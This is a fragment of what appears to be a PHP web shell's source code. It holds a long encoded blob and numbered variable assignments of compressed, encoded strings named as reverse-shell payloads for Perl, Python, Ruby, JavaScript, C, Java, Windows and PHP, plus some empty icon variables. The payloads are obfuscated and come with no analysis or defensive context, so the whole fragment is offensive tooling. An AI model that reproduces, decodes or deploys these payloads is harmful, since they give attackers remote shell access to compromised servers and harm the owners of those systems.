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";
  113. $s_rs_pl ="lZLxj5MwGIZ/Xv+KyvU2SLhj80xMVllcGJrlvLHQncY4JQw+BzlGCe3pzG7+7bbIOaIxUX7q9/bL8zZPOHvi3Iva2eSlA+UXXEFdoDOcSVmJseMkPIXLLefbAi4TvnMqZ3P1/NndhcigKBx0LwDPg/GY8eQOJEWEC5d8CtRBZK4B+4rXEq/88MbdS6h3dMlG7mBNlu9m68mAtvcqpE2/yPBFblCUfzY16PvO+arS3Do0tHMvuGFL3zvHzrVBj4hIdwuyqrnkm29lvANzIJNqYFEkmteYzO4vX0Xzhb+y+yzwriO2Cv3pjU2k9fCQ5mBaTdXLafj6reuOrAPqkcolevww/EhRT4DUKF5pFgveRJqiaCyIQv+W+dPZLLRHitJTr0/Vjt6O07SO8tIklT1f6I1ounhvnRp7RS4klGr7qhPGSQKqxrOZ1RQrnGcbjWvcuMZjnPCyhERCui4Ne6j3eAUlZqvZfGEbL/qeQR+D4HZlG5Nu4odhm6Ae7CHByumpPim4ANOz6M8D+3XQ7M6guJ1JMa0Gl0s8pAgdERTiZPTpn0ZJ1k6jZsrdvAQZxZIrX1lHB4nd31ySvHPdmlAOSdyJG23s37SZrbZJnxkWfUxab92oFaejv5v7L2GNJjhobab6e45IfT8A";
  114. $s_rs_py = "lVRtT9swEP6c/IpgpmGrwaGFaVJZKiEIE9qAqu20D8Cq1LkmEalt2S6Ufz87SV9ATGiqWveee3vOd+f9vWipVTQreQT8KZAvphDc3w8KY6TuRxETGdBciLwCysQiktHs+OvJ46EuoKoiv1xIoUygINTLmVSCgdah0KF+sV/BHsGEplyAL2OE/ML9ZDAPamfMSN/3nE+89aVDIYFjFtYm8UQtbWSTiaV5ZXQ1TBwMSr0Hl/wtSnxPgVkqHjiUNhGpgjTDpLOGbLQdaCENJn5NN2WmFLzhW84DoSlPF7AXI26Qhbx5zOi8rIAL6+F5Vm/LN7DACFb19UyS0XW8MqAWp8NxNz74NPx9MTg4bbUWOq0boIvgsAy+fUYdbRSekw4KBrtCbyvZPFBpcNmfC5s6cDflJM+ol/r0lGWlgD3h7lHvxPHyYMVAmkYrU61rrI3iucpsCViRwVEDeLNYAdWQKlZgxLL7AN/9udcPHYJCFc6rNNfO4Or7ze0oOT8bJ6Rxs4FmbYT2umRqClrqrFR4RnMllhJ3CVnbuAtjxRtlq7ONAZ7hdT9aeEvaOrvRqOdJkZ2kSxOkPKsrsv9dTW0oJ/mbIEE7FpeplZpur3P1NzOD7jnqWJI5GPbsxgMNkJ/Htsk0VfmT395cTuK450Y6zu+6Dz5UO/jxFvcKe/ac3uaHVWlsuXY/Sm6wJL6Om7WhzYFb6exyenWTTNqdouPb8x/T8WSUnF1bF1uYcQohN/bj259TZ7TrMh0lv8bJ2cXFKLQZ35DW1E5ghjE6ovUHhdLdtqZVaUeZ4y+vPFw5btAC2znBOTCDcdF4bIfMLT7VFYB03pumvbdBnm6ag+rHpXkfgn7QxobMNsA1bdP3D8xRZ3dg2vXVxG/9HXP7xKQktg1kji7+F/HuR8TZ/xH/wPxd4oz4fwE=";
  115. $s_rs_rb = "tVZrb9s2FP1M/QqWySprcaSm6zDMmWL0sQ4FVtRI0w1DlRU2dW0RkUmNpOoUSfbbx5ccu7aTDNhoGJTuPbxP3mPvPcpaJbMJ4xnwz1i2ky/RHq60btQgy6goIZ0JMashpWKeNdnkux+eXRyqCuo6iyT81TIJOFaCXoCObwXNWFd8PIc4ikqYYtXSCxUhCbqVHJ9+ePHHp9Gvz89evzt9m5ZiwelYQTofa1r14rlaMH5tv3PGZ4s4GWrZwmA6rhVEwEtvUcK4tk56SsvEWM7NHiE2xa+ZiRUumdJqGJRGOwrxpBwWTpp2BlItPpnQrGF73EWKdQUcy1ymM9VOelmRZX1SFCTBDhbSkD4ac+j56S+/pTXwma7y/CjCZlnRxyfn+d/Znx+fHP54fnXU//5mPxs2+RuuYQayFxDJwASr3RmVn70cvQf5GaSLk5B+kzgNzVU6phQaD6RpIxnXmLhuYNcNPMBUcA5UQ1lw4nATmDHunuwygXKhQy/wyprm1FaBrQnhEihWzs+0R+CyEVLjs59P3+aXGuT8ePT+KI+L/dHvr4qT+DjojfDY3SVV4UOGi5+Kx9+UuDhx21O/k/7UfpKlN7CNXXXdpbfsMUlJckBOyBpqUZlO49rEPgO9npBdcswUYJBSyBdS2ORr24ySQSGH+9kGPlSnTmkl5k2eE7IBCTBrh5Y4/TZjWyF21Xkd7o5BZqwfx4k3vPNEd3VLMz9UC/ll2KuTnWjvY1mge5CvmDTejeW7gPYy79I9rCNLS7UKZSoWgzvLtC1pX6cHJ3Qf/D9NC3aaevMubUQDvFf3iSTJ1TUT1515JizblAfEzOXBhq+b7c62hP21bPW9e5agaHt77w35LekFuGrlbQYqpbVYyUjlnNVRZ8v3cI3YnjqC3EFsxtEmtR0baZW7t6Nzw7G2gCEgT7ie8dyPh2e8vavqxrEeUg/gOOQJDqE1akMITQ1fOkZD1t3/TWSoy2wZ9OaFMsqOsJQnLCNB95CUix9tYSYU5KtU5GRoN/Gg7tAWmkHd4VVGCcI18vAi1zu37kzY1eUrJtgdRTfIm27XNf/GOQTktulUD5zONadh91v4M7B14FCYNhulnzPz5CYMhfHyk+fAVvIP";
  116. $s_rs_js = "nVHLasMwEDwrkH8wvliGVIImUEjIqZ/QY/rAkTeWqCy5kpwUQv69kuykebSl2Afh3Zmd3Z2lNOHONXZOKdMlkErrSgJhuqYNXU8fZu93loOUdDzaFiaxTbFTyTIx8NEKAzhjXMjyrTGagbVZTiJh0ZEVuHOqD7O8h6wzUNTnaJc5EZhWVku4aNWlIqVXCZN5SkbXQlHLM4+IDe6nIY0s3EabmtSFYxzT151niTz/rmN1SeATQl3SSRam2nrkKBHCTjT8EQmqcny5nOb78QgFPvdkvxhhfnoHT2C2YPCmVcwJrbCNPGTJzggHOI2G9u3nYUcFzEH5rNKwVNJ/3WpeOJqJI/0ct5xYVwpFDNi2BpxfQ7p1xHdPy8IV6eQ4TYJDnO+P08RocbhVBmMGlv9Vdhz6php1LydSWAcqOr26fwnJw3gE0kJy7f/s5L+98P+xczRY36tM4kVX0yj330Og3y6AfrAeDfQcDTQbDXP58AU=";
  117. $s_rs_c = "rVJhb9owEP0Mv8JjU+tQFxPaaVJpKqFCJbQVEGSapg1FwTHEqrGj2EzQqf99thMYYdqkSf0Q5e7d8zv73uEmSLXO1A3GRCa0tZJyxWmLyDXO8OLqw/XTpUop5xg0cf0tE4RvEgpulU6YbKV3FShnYnWKJZwtTrCdwnqXUfUnrCR5orqKC6qZ+TATVXwjmFG3GBMarGMmoA3ifEUQSeMcNE3449vc+1mv2YJCBMnA79Zr5qIbYgDTLE6SPGICMAOzJbSHg6Bjj9RYSzERLeM147ug9xANR4Owe8Azmesg1VIoGGvJoOvlzz3vN8Vqt5T7OSaHw1Gv359GvdFXR1NB8V5YqqPZ+P5jNAung94jahcUqi1HZhoqU/4UWYpjRtPB59nA6qEziRR7pnIJZdl/Cd8oj26ZhoXMgonECMCTl4Omd8ZQe+sXLG4GSoXhvXcpCWJCqOvcPlzH6BDUcHsB3F6AG0CkEJRomnwXDdS5LrnJJusYbiXxj5NOIbkzTdewQbd2pCAcTB+Drab5ujuZ+cH5u8mX/t15t6wayISUAGxehFUKLlmjuCuXikJi45d6jXJFwcHOq9e30y6kiwpiZ15M+Znmco8gM2tuprknXPgXx8he+587MJxMpuNwHIX3k72vsBz2X90sN+Gk5nnebft4I5yT6j+cVNXEP05e30lVOPlS/wU=";
  118. $s_rs_java = "lVRNb9swDD2nQP+DkJM9ZHaTDdjWIsOwYYcBA1osvXXBoMiMrdWWBIn5Qpr/PkqWXXftpQfbEvlEPj5SznNWIRp3medCF5CVWpc1ZEI3uclX7z68v3/rKqjr/PxMNkZbZH/5lmdSZ2+unpoUYLCdn5nNqpaCiZo7x0KMP9Ydz89GxsotR2AOORJgLRWvI8wggz2CKhy7rSzwwuP7Az+U2eACyd4w6a6GrusNPvr0BgMDcrccDCZPz06eHUiPWEmXSTenyGFJxrmPdGpDfbnegrWygEHcrZYFsxuVpIHnCO2hXYxWB4S7JVuxOVOwY2H7cfpptrxq/VIhE+SkPL7MZJVGx66SNSTi8/wiZTHWiFhkOysRktXkYiI6aLCv642rkt70YsxT+LRvwVFUyfe9AINSKwbpETJSUZEWXNzfWi6AwgWwf7XVx3pjx0LZDZcqIf2kKqlQbkvXiuAr8+MQcrd+JpqCeI3zlVS5q8bBJdfJ4uAQmqwEvLHagMVDMtYuU7yBcZqh/ql3YL9xR4QyqQrYX6+T8U6qcerlOcao9Bm3fGO2nbeGgWNhaNklE1opEAjFb9VmH/Rn5wl8pb2LMi60uAdkVexdu42+vsNE39ec1aBKrObzaRyBUbgKc5pVhBJsZrh1QJuAvrtYdj1ZgKV5iqlcl2pgTHygDu25uIwL37Wu2W0/oXbA/iczey2ZVjhpCBtc0+Ug8UAEaSZswOv0shTs4YG9zGd4C0vpy668+gNzP8pPLmipe+zQ3oPJ392QzkQjJcD/Uujgr41C2YA/Hpc0UbAHkdDwpPFfQWrR5E5jwaSzeUZt4ol0CTx69ogu/V/FPGfYw6cZXR/r22dm/fJRxvB6xe2k5/QP";
  119. $s_rs_win = "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";
  120. $s_rs_php = "7VVNb+M2ED3bgP+DlhUQCVUsyy6wQFxmL+2xwKIt0MMmFWSKsghLIsuhai+a/PcORcnWOk6yaLe9tDBikzOcx/l4fPn2nSrVbPqVVxqj4CaOmcz5fCvltuJzJutYxZvV229211DyqopnU6611KnmSmojmm2wCNezKXCTGlHztBK1MM4mN6moVSWYMGlRtVAG1jqb+ibTW26oD6kGt14frUD5QVWYQkA8EvVGG+czoMlq9dYu9xlt2qqyS35aQkkJBmNa3s/f//gDPRiu6/X7nxJ6dee//+W726t170bbOt6IJobSuxbEBteUdGV6XZnejcdk03BmeH7XkC5tUQRMto0JhkxDSpPwj9l04ivqH+uY+JgG6RYGMUWT280j9q0CfgljeYYBHxb3Pc7RktwfATO26wG7lIq2YUbIJuUHAQaCK8UaU6WF1LursEcWOT1ZuyFMMLKz0+skxEgTJGOzMy0Gk5IgDimOGEQehGcxQyKYXF+uuxUoGM2zOgXJdsgO4Pp3rgNimEKSLebd54bMfRX5SKlGdj8Y0906xPa0ki22DKKVS8lnZ9gZY1zZE0PG6Dayknu8ENoN7gIkedo2Wc2DMFpEqxDLIHvRuGQnxV4LwwOfRX49x46zPRY6J7ekA5zsS1GhV72htMhwjC7Izqyw48E4d65rlubbtM4MKwMSs/zOCz78egf3X4exQD5jsVqHffzEz3OK+368Ll5AmgsdoCsMWTkse78v6Tg7Z33svnt6GS3qcfm+6kq18yLew4P3jP+3Fv2ht8Gu7tZHPA/v4wdbOV6H72D+9PJR56TLskunYJUEfmzMsHUDsics/JPWu8N+DjTTOvsYLOitWxAlFCcR0SSMknPjHo3LC8YeTWmqtGSpVLzBDMoI8XEQQjk/9uwN9lxzkK1mtlacz+hJjKm4qZBvVvNsOD7TaPHKkeT1I8uXj7DB6zhodDuwzz5+Lgvb44cHt3JXhuFojL7O+mbaDvc59Rf3rDreW6HeBRgQocDia8wiq6wnZosmPSHp7MRiQQtEyDs7g4Grw2D7VvkiHNP1E7whrYugg/MpMnsVdPkS6PKzQB/P+Dti9rB0FX66T872Q7c7Kg52PTyH078HJ6NW5AcZLazIOfKWnYDwBv+OYvg31A7+otrBf17t4LLavSBv8L+8XToCr8sbfKa8wReTN3hGNODflTf4J+TtHPQ5efsimvbu9k8=";
  121. $s_favicon = "";
  122. $s_arrow = "";
  123. $s_dark_cb = "";
  124. $s_bright_cb = "";
